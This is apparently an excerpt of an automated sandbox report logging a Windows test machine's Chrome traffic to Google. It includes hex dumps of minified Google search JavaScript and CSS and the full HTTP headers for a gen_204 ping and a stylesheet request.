                                                                                                                                                                                                                                                                                          Data Ascii: this._hd=this._hd||{};(function(_){var window=this;try{_.L$c=_.Ed("P10Owf",[_.gq]);}catch(e){_._DumpException(e)}try{_.w("P10Owf");var GD=function(a){_.A.call(this,a.Ma);this.ka=this.getData("cmep").Kb();this.Ob=a.service.Ob;this.data=a.Td.tda};_.C(
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC1390INData Raw: 4a 75 28 29 29 26 26 28 28 63 3d 61 2e 64 61 74 61 29 3d 3d 6e 75 6c 6c 3f 30 3a 63 2e 4a 75 28 29 29 26 26 28 62 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 62 2e 4a 75 28 29 29 21 3d 3d 61 2e 64 61 74 61 2e 4a 75 28 29 7c 7c 61 2e 4f 62 2e 6b 61 28 29 2e 6f 61 28 61 2e 67 65 74 52 6f 6f 74 28 29 2e 65 6c 28 29 2c 32 29 2e 6c 6f 67 28 21 30 29 7d 3b 47 44 2e 70 72 6f 74 6f 74 79 70 65 2e 48 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 4f 62 2e 6b 61 28 29 2e 6b 61 28 61 2e 71 62 2e 65 6c 28 29 29 2e 6c 6f 67 28 21 30 29 3b 5f 2e 6e 66 28 64 6f 63 75 6d 65 6e 74 2c 5f 2e 55 78 63 29 7d 3b 47 44 2e 70 72 6f 74 6f 74 79 70 65 2e 43 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 4f 62 2e 6b 61 28 29 2e 6b 61 28 61 2e 71 62 2e 65 6c 28 29
                                                                                                                                                                                                                                                                                          Data Ascii: Ju())&&((c=a.data)==null?0:c.Ju())&&(b==null?void 0:b.Ju())!==a.data.Ju()||a.Ob.ka().oa(a.getRoot().el(),2).log(!0)};GD.prototype.Ha=function(a){this.Ob.ka().ka(a.qb.el()).log(!0);_.nf(document,_.Uxc)};GD.prototype.Ca=function(a){this.Ob.ka().ka(a.qb.el()
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC1390INData Raw: 61 29 3b 43 35 63 28 74 68 69 73 29 7d 3b 0a 76 61 72 20 43 35 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 6b 75 28 61 2e 67 65 74 52 6f 6f 74 28 29 2e 65 6c 28 29 29 3b 5f 2e 7a 35 63 28 22 66 73 22 29 3b 61 2e 6b 61 3f 5f 2e 6e 66 28 64 6f 63 75 6d 65 6e 74 2c 5f 2e 52 78 63 2c 61 2e 64 61 74 61 2e 4c 63 28 29 29 3a 5f 2e 6e 66 28 64 6f 63 75 6d 65 6e 74 2c 5f 2e 51 78 63 2c 61 2e 64 61 74 61 29 3b 5f 2e 6e 66 28 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2c 5f 2e 4a 77 62 29 3b 5f 2e 77 77 28 61 2e 67 65 74 52 6f 6f 74 28 29 2e 65 6c 28 29 2c 22 68 69 64 65 5f 70 6f 70 75 70 22 29 3b 61 2e 74 61 26 26 61 2e 74 72 69 67 67 65 72 28 5f 2e 79 35 63 29 7d 3b 5f 2e 4c 28 42 35 63 2e 70 72 6f 74 6f 74 79 70 65 2c 22 79 4d 31 59 4a 65 22
                                                                                                                                                                                                                                                                                          Data Ascii: a);C5c(this)};var C5c=function(a){_.ku(a.getRoot().el());_.z5c("fs");a.ka?_.nf(document,_.Rxc,a.data.Lc()):_.nf(document,_.Qxc,a.data);_.nf(window.document.body,_.Jwb);_.ww(a.getRoot().el(),"hide_popup");a.ta&&a.trigger(_.y5c)};_.L(B5c.prototype,"yM1YJe"
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC1390INData Raw: 64 22 29 2e 65 6c 28 29 3b 63 26 26 62 2e 70 75 73 68 28 63 29 3b 72 65 74 75 72 6e 20 62 7d 3b 5f 2e 6d 2e 55 38 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6b 75 61 7d 3b 0a 5f 2e 6d 2e 69 75 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 70 72 65 66 69 78 3d 22 22 7d 3b 76 61 72 20 50 6e 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 43 50 28 29 3b 5f 2e 46 61 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 29 7b 76 61 72 20 64 3d 61 2e 6b 61 28 63 29 3b 69 66 28 64 2e 69 73 53 65 6c 65 63 74 65 64 28 29 26 26 64 2e 69 73 45 6e 61 62 6c 65 64 28 29 29 73 77 69 74 63 68 28 64 2e 67 65 74 54 79 70 65 28 29 29 7b 63 61 73 65 20 32 3a 51 6e 63 28 61 29 3b 64 2e 71 72 28 21 30 29 3b 61 2e 77 61 3d 63 3b 62 72
                                                                                                                                                                                                                                                                                          Data Ascii: d").el();c&&b.push(c);return b};_.m.U8c=function(){return this.kua};_.m.iuc=function(){this.prefix=""};var Pnc=function(a){var b=a.CP();_.Fa(b,function(c){var d=a.ka(c);if(d.isSelected()&&d.isEnabled())switch(d.getType()){case 2:Qnc(a);d.qr(!0);a.wa=c;br
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC1390INData Raw: 2e 6d 3d 5f 2e 73 7a 2e 70 72 6f 74 6f 74 79 70 65 3b 5f 2e 6d 2e 54 71 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 77 61 7d 3b 5f 2e 6d 2e 68 39 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 43 61 7d 3b 5f 2e 6d 2e 64 75 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 61 7d 3b 0a 5f 2e 6d 2e 4e 43 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2e 54 71 28 29 3b 72 65 74 75 72 6e 20 61 3f 74 68 69 73 2e 6b 61 28 61 29 2e 67 65 74 43 6f 6e 74 65 6e 74 28 29 3a 22 22 7d 3b 5f 2e 6d 2e 6b 4c 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2e 43 50 28 29 5b 30 5d 3b 72 65 74 75 72 6e 20 61 3f 74 68 69 73 2e 4a 57 28 61 29 3a 6e 75
                                                                                                                                                                                                                                                                                          Data Ascii: .m=_.sz.prototype;_.m.Tq=function(){return this.wa};_.m.h9c=function(){return this.Ca};_.m.duc=function(){return this.oa};_.m.NCa=function(){var a=this.Tq();return a?this.ka(a).getContent():""};_.m.kLb=function(){var a=this.CP()[0];return a?this.JW(a):nu
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC1390INData Raw: 7d 3b 5f 2e 6d 2e 65 75 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 6f 61 3d 3d 3d 6e 75 6c 6c 26 26 52 6e 63 28 74 68 69 73 2c 74 68 69 73 2e 43 50 28 29 5b 30 5d 29 7d 3b 5f 2e 6d 2e 66 75 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2e 67 65 74 52 6f 6f 74 28 29 2e 65 6c 28 29 3b 5f 2e 4a 65 28 61 2c 5f 2e 4c 6e 63 29 7d 3b 5f 2e 6d 2e 67 75 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2e 67 65 74 52 6f 6f 74 28 29 2e 65 6c 28 29 3b 5f 2e 4a 65 28 61 2c 5f 2e 4d 6e 63 29 3b 52 6e 63 28 74 68 69 73 2c 6e 75 6c 6c 29 7d 3b 5f 2e 6d 2e 68 75 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 61 3d 56 6e 63 28 61 29 29 26 26 52 6e 63 28 74 68 69 73 2c 61 2c 21 30 29 7d 3b 0a 5f 2e 6d 2e 57 6a 3d 66 75 6e
                                                                                                                                                                                                                                                                                          Data Ascii: };_.m.euc=function(){this.oa===null&&Rnc(this,this.CP()[0])};_.m.fuc=function(){var a=this.getRoot().el();_.Je(a,_.Lnc)};_.m.guc=function(){var a=this.getRoot().el();_.Je(a,_.Mnc);Rnc(this,null)};_.m.huc=function(a){(a=Vnc(a))&&Rnc(this,a,!0)};_.m.Wj=fun
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC1390INData Raw: 72 65 74 75 72 6e 20 63 3d 3d 3d 65 7d 29 2c 64 3d 5f 2e 4e 63 62 28 64 2c 62 3f 2d 61 2d 31 3a 2d 61 29 2c 61 3d 64 2e 66 69 6e 64 49 6e 64 65 78 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 63 3d 3d 3d 65 7d 29 29 3b 72 65 74 75 72 6e 20 64 7d 3b 0a 5f 2e 73 7a 2e 70 72 6f 74 6f 74 79 70 65 2e 48 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 26 26 28 74 68 69 73 2e 4f 61 28 61 29 2c 28 61 3d 74 68 69 73 2e 4a 57 28 61 29 29 26 26 61 2e 66 6f 63 75 73 28 29 29 7d 3b 0a 5f 2e 73 7a 2e 70 72 6f 74 6f 74 79 70 65 2e 4f 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 29 7b 76 61 72 20 63 3d 5f 2e 51 6c 2e 67 65 74 53 69 7a 65 28 74 68 69 73 2e 6d 65 6e 75 29 3b 69 66 28 63 2e 68 65 69 67 68 74 3c 74 68 69 73 2e 6d 65 6e 75 2e 73 63
                                                                                                                                                                                                                                                                                          Data Ascii: return c===e}),d=_.Ncb(d,b?-a-1:-a),a=d.findIndex(function(e){return c===e}));return d};_.sz.prototype.Ha=function(a){a&&(this.Oa(a),(a=this.JW(a))&&a.focus())};_.sz.prototype.Oa=function(a,b){if(a){var c=_.Ql.getSize(this.menu);if(c.height<this.menu.sc
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC1390INData Raw: 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 43 50 7d 29 3b 5f 2e 4c 28 5f 2e 73 7a 2e 70 72 6f 74 6f 74 79 70 65 2c 22 6d 4a 36 30 6a 62 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 50 37 63 7d 29 3b 5f 2e 67 72 28 5f 2e 4e 6e 63 2c 5f 2e 73 7a 29 3b 0a 5f 2e 79 28 29 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 79 75 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 2c 6b 29 7b 76 61 72 20 6c 3d 5f 2e 24 77 62 28 63 29 2c 70 3d 5f 2e 51 6c 2e 67 65 74 42 6f 75 6e 64 73 28 61 29 2c 72 3d 5f 2e 51 6c 2e 42 5f 28 61 29 3b 72 26 26 5f 2e 76 41 61 28 70 2c 5f 2e 74 41 61 28 72 29 29 3b 5f 2e 51 6c 2e 48 50 64 28 70 2c
                                                                                                                                                                                                                                                                                          Data Ascii: tion(){return this.CP});_.L(_.sz.prototype,"mJ60jb",function(){return this.P7c});_.gr(_.Nnc,_.sz);_.y();}catch(e){_._DumpException(e)}try{_.yu=function(a,b,c,d,e,f,g,h,k){var l=_.$wb(c),p=_.Ql.getBounds(a),r=_.Ql.B_(a);r&&_.vAa(p,_.tAa(r));_.Ql.HPd(p,
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC1390INData Raw: 2b 63 2e 77 69 64 74 68 3e 65 2e 72 69 67 68 74 26 26 28 63 2e 77 69 64 74 68 3d 4d 61 74 68 2e 6d 69 6e 28 65 2e 72 69 67 68 74 2d 67 2e 78 2c 68 2b 63 2e 77 69 64 74 68 2d 65 2e 6c 65 66 74 29 2c 63 2e 77 69 64 74 68 3d 4d 61 74 68 2e 6d 61 78 28 63 2e 77 69 64 74 68 2c 30 29 2c 64 7c 3d 34 29 7d 67 2e 78 2b 63 2e 77 69 64 74 68 3e 0a 65 2e 72 69 67 68 74 26 26 66 26 31 26 26 28 67 2e 78 3d 4d 61 74 68 2e 6d 61 78 28 65 2e 72 69 67 68 74 2d 63 2e 77 69 64 74 68 2c 65 2e 6c 65 66 74 29 2c 64 7c 3d 31 29 3b 66 26 32 26 26 28 64 7c 3d 28 67 2e 78 3c 65 2e 6c 65 66 74 3f 31 36 3a 30 29 7c 28 67 2e 78 2b 63 2e 77 69 64 74 68 3e 65 2e 72 69 67 68 74 3f 33 32 3a 30 29 29 3b 67 2e 79 3c 65 2e 74 6f 70 26 26 66 26 34 26 26 28 67 2e 79 3d 65 2e 74 6f 70 2c 64 7c
                                                                                                                                                                                                                                                                                          Data Ascii: +c.width>e.right&&(c.width=Math.min(e.right-g.x,h+c.width-e.left),c.width=Math.max(c.width,0),d|=4)}g.x+c.width>e.right&&f&1&&(g.x=Math.max(e.right-c.width,e.left),d|=1);f&2&&(d|=(g.x<e.left?16:0)|(g.x+c.width>e.right?32:0));g.y<e.top&&f&4&&(g.y=e.top,d|
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC1390INData Raw: 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 76 75 3d 5f 2e 4a 28 22 42 55 59 77 56 62 22 29 3b 5f 2e 47 77 62 3d 5f 2e 4a 28 22 4c 73 4c 47 48 66 22 29 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 77 28 22 44 50 72 65 45 22 29 3b 0a 5f 2e 7a 75 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 41 2e 63 61 6c 6c 28 74 68 69 73 2c 61 2e 4d 61 29 3b 76 61 72 20 62 3d 74 68 69 73 3b 74 68 69 73 2e 6b 61 3d 31 3b 74 68 69 73 2e 6f 66 66 73 65 74 59 3d 74 68 69 73 2e 6f 66 66 73 65 74 58 3d 30 3b 74 68 69 73 2e 4b 61 3d 74 68 69 73 2e 4e 61 3d 74 68 69 73 2e 43 61 3d 21 31 3b 74 68 69 73 2e 64 61 74 61 3d 61 2e 6a 73 64 61 74 61 2e 41 35 63 3b
                                                                                                                                                                                                                                                                                          Data Ascii: e){_._DumpException(e)}try{_.vu=_.J("BUYwVb");_.Gwb=_.J("LsLGHf");}catch(e){_._DumpException(e)}try{_.w("DPreE");_.zu=function(a){_.A.call(this,a.Ma);var b=this;this.ka=1;this.offsetY=this.offsetX=0;this.Ka=this.Na=this.Ca=!1;this.data=a.jsdata.A5c;


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          54192.168.2.749809142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC1417OUTPOST /gen_204?atyp=csi&ei=CsT2Zo-iIaySxc8Pn72EmA8&s=promo&rt=hpbas.6217&zx=1727448079917&opi=89978449 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                                          sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Origin: https://www.google.com
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=1-jP50VdntYJdUmLGhd4IH-fKwayJuWzEtgEzrCcF9uJbqMxc-lGo_azGSyuo8flOPRdgGAhTS_zQD91euKYwm2UDU2l5wCr8i5jVFbHNH7gCV2i-OdMEh435nEWJS1O2sysBHD9Et_d-recXkdU0jBp1ViT9rYioYfR9uH0pTk693iSXfACzsSMnZKBnGgMZY-IRpOttdQ
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:22 UTC715INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-orMiC2nDMFI6LlGKbUalQA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]}
                                                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:22 GMT
                                                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          55192.168.2.749813142.250.186.1324435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC1125OUTGET /xjs/_/ss/k=xjs.hd.8JyeNrzotDo.L.B1.O/am=JCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAAEAAAAAAAAAAoAHYSAACMAAA2ACAAAAAAAAQAAAMAAAAAAEACAAAABMACAAAAAAAEACASAABAEQAAAACBECAAAAEUQAgQgAQIFEEoBAAAAAYAAAgBYIBhAIIKAEYBAgAAAAAAIEAEAAAARQACBADoIRAABgJhAgAgBPQABAAAAIAAAAJAAAAYAANkAAIAAAAAAADIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAAQAEAAAAAAAAAAAAAAAAAAAAE/d=0/br=1/rs=ACT90oGeXue4vCo29BBNLxd3Hctkci5Jig/m=syjv,syo3?xjs=s4 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=1-jP50VdntYJdUmLGhd4IH-fKwayJuWzEtgEzrCcF9uJbqMxc-lGo_azGSyuo8flOPRdgGAhTS_zQD91euKYwm2UDU2l5wCr8i5jVFbHNH7gCV2i-OdMEh435nEWJS1O2sysBHD9Et_d-recXkdU0jBp1ViT9rYioYfR9uH0pTk693iSXfACzsSMnZKBnGgMZY-IRpOttdQ
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC809INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                                          Content-Type: text/css; charset=UTF-8
                                                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="gws-team"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 1689
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:23 GMT
                                                                                                                                                                                                                                                                                          Expires: Sat, 27 Sep 2025 14:41:23 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, immutable, max-age=31536000
                                                                                                                                                                                                                                                                                          Last-Modified: Thu, 26 Sep 2024 19:25:19 GMT
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC581INData Raw: 2e 4d 54 49 61 4b 62 2c 2e 4c 77 44 55 64 63 2c 2e 46 41 6f 45 6c 65 2c 2e 52 6c 54 43 50 64 2c 2e 77 50 4e 66 6a 62 2c 2e 63 61 4e 76 66 64 2c 2e 56 6e 6f 62 34 62 2c 2e 62 62 78 54 42 62 2c 2e 44 70 67 6d 4b 2c 2e 59 4b 55 68 66 62 2c 2e 75 4e 6e 76 62 2c 2e 61 56 73 5a 70 66 2c 2e 52 6f 4f 56 6d 66 2c 2e 64 49 66 76 51 64 2c 2e 56 33 45 7a 6e 2c 2e 45 6e 62 39 70 65 2c 2e 6d 59 75 6f 61 66 2c 2e 6b 4a 53 42 38 2c 2e 74 55 72 34 4b 63 2c 2e 69 51 4d 74 71 65 7b 2d 2d 59 69 34 4e 62 3a 76 61 72 28 2d 2d 6d 58 5a 6b 71 63 29 3b 2d 2d 70 45 61 30 42 63 3a 76 61 72 28 2d 2d 62 62 51 78 41 62 29 3b 2d 2d 6b 6c 6f 47 33 3a 76 61 72 28 2d 2d 6d 58 5a 6b 71 63 29 3b 2d 2d 59 61 49 65 4d 62 3a 76 61 72 28 2d 2d 58 4b 4d 44 78 63 29 3b 2d 2d 50 61 38 57 6c 62 3a
                                                                                                                                                                                                                                                                                          Data Ascii: .MTIaKb,.LwDUdc,.FAoEle,.RlTCPd,.wPNfjb,.caNvfd,.Vnob4b,.bbxTBb,.DpgmK,.YKUhfb,.uNnvb,.aVsZpf,.RoOVmf,.dIfvQd,.V3Ezn,.Enb9pe,.mYuoaf,.kJSB8,.tUr4Kc,.iQMtqe{--Yi4Nb:var(--mXZkqc);--pEa0Bc:var(--bbQxAb);--kloG3:var(--mXZkqc);--YaIeMb:var(--XKMDxc);--Pa8Wlb:
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC443INData Raw: 6e 66 7b 70 61 64 64 69 6e 67 3a 30 20 31 36 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 2e 59 70 63 44 6e 66 2e 48 47 31 64 76 64 7b 70 61 64 64 69 6e 67 3a 30 7d 2e 48 47 31 64 76 64 3e 2a 7b 70 61 64 64 69 6e 67 3a 30 20 31 36 70 78 7d 2e 57 74 56 35 6e 64 20 2e 59 70 63 44 6e 66 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 38 70 78 7d 2e 5a 74 30 61 35 65 20 2e 59 70 63 44 6e 66 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 34 38 70 78 7d 2e 47 5a 6e 51 71 65 20 2e 59 70 63 44 6e 66 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 33 70 78 7d 2e 45 70 50 59 4c 64 3a 68 6f 76 65 72 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 45 70 50 59 4c 64 2c 2e 43 42 38 6e 44 65 3a 68 6f 76 65 72 7b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74
                                                                                                                                                                                                                                                                                          Data Ascii: nf{padding:0 16px;vertical-align:middle}.YpcDnf.HG1dvd{padding:0}.HG1dvd>*{padding:0 16px}.WtV5nd .YpcDnf{padding-left:28px}.Zt0a5e .YpcDnf{line-height:48px}.GZnQqe .YpcDnf{line-height:23px}.EpPYLd:hover{cursor:pointer}.EpPYLd,.CB8nDe:hover{cursor:default
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC665INData Raw: 6e 44 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 20 38 70 78 20 63 65 6e 74 65 72 7d 2e 5a 74 30 61 35 65 2e 43 42 38 6e 44 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 69 63 6f 6e 73 2f 6d 61 74 65 72 69 61 6c 2f 73 79 73 74 65 6d 2f 31 78 2f 64 6f 6e 65 5f 62 6c 61 63 6b 5f 31 36 64 70 2e 70 6e 67 29 7d 40 6d 65 64 69 61 20 28 66 6f 72 63 65 64 2d 63 6f 6c 6f 72 73 3a 61 63 74 69 76 65 29 7b 2e 5a 74 30 61 35 65 2e 43 42 38 6e 44 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 69 63 6f 6e
                                                                                                                                                                                                                                                                                          Data Ascii: nDe{background:no-repeat left 8px center}.Zt0a5e.CB8nDe{background-image:url(https://ssl.gstatic.com/images/icons/material/system/1x/done_black_16dp.png)}@media (forced-colors:active){.Zt0a5e.CB8nDe{background-image:url(https://ssl.gstatic.com/images/icon


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          56192.168.2.749815142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
